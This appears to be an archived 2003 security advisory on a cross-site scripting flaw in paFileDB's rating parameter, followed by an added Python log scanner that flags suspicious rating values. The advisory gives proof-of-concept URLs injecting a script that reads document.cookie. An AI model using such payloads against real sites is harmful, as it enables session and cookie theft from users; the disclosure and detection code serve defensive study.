26th Mar 2003 [SBWID-6091]
COMMAND
PHP-Arena XSS
SYSTEMS AFFECTED
PHP-Arena v?
PROBLEM
Thanks to dEcKa [decka_trash@yahoo.com] for the kind advisory:
The Example Is Like This. It's So Simple:-
http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=[script]
Fast Example:-
http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=<scr!pt>alert(document.cookie)</scr!pt>
Done. So Simple Right. The Problem Is In paFileDB Management Script.
SOLUTION
?
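Added example (not part of the advisory or of paFileDB's code): a log check that flags pafiledb.php requests with action=rate whose rating parameter is not a plain integer, matching the URL pattern shown above. The log lines are constructed, and the rule that a legitimate rating is a short integer is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Mar/2003:10:00:01 +0000] "GET /pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=8 HTTP/1.0" 200 512',
    '192.0.2.11 - - [26/Mar/2003:10:00:07 +0000] "GET /pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=%3Cb%3Ex%3C%2Fb%3E HTTP/1.0" 200 540',
    '192.0.2.12 - - [26/Mar/2003:10:00:09 +0000] "GET /pafiledb/pafiledb.php?action=category&id=2 HTTP/1.0" 200 2048',
    '192.0.2.13 - - [26/Mar/2003:10:00:15 +0000] "GET /pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=5&rating=%22%3E HTTP/1.0" 200 530',
    '192.0.2.14 - - [26/Mar/2003:10:00:20 +0000] "GET /index.php?rating=%3Ci%3E HTTP/1.0" 200 100',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
NUMERIC_RE = re.compile(r"\d{1,3}")  # assumption: a legitimate rating is a short integer


def suspicious_rating(line):
    """Return the offending URL-decoded rating value, or None if the line is clean."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/pafiledb.php"):
        return None
    # keep_blank_values so an empty "rating=" is still inspected
    params = parse_qs(url.query, keep_blank_values=True)
    if "rate" not in params.get("action", []):
        return None
    # Check every occurrence: duplicate parameters may be resolved differently
    # by the application and by anything sitting in front of it.
    for value in params.get("rating", []):
        if not NUMERIC_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (client_ip, decoded_rating) for each flagged line."""
    hits = []
    for line in lines:
        bad = suspicious_rating(line)
        if bad is not None:
            hits.append((line.split(" ", 1)[0], bad))
    return hits


if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}\trating={value!r}")
```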